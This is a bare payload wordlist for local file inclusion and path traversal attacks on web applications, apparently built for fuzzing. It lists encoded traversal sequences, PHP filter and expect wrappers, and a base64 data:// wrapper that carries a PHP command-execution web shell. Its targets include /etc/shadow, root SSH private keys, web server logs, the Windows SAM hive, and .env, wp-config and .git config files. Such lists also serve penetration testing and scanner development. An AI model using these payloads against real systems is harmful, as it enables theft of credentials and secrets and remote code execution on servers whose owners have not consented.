../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=config
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=../includes/config
php://filter/convert.base64-encode/resource=../includes/config.php
php://filter/convert.base64-encode/resource=login
php://filter/convert.base64-encode/resource=upload
php://filter/convert.base64-encode/resource=admin
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
expect://id
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/mounts
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/auth.log
/var/log/syslog
/var/mail/root
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/www-data/.bash_history
..\..\windows\system32\config\sam
..\..\..\windows\system32\config\sam
..\..\..\..\windows\system32\config\sam
..\..\windows\system.ini
..\..\windows\win.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
../wp-config.php
../../wp-config.php
../../../wp-config.php
../configuration.php
../../configuration.php
../config/database.yml
../../config/database.yml
../.env
../../.env
../../../.env
../.git/config
../../.git/config
../../../.git/config
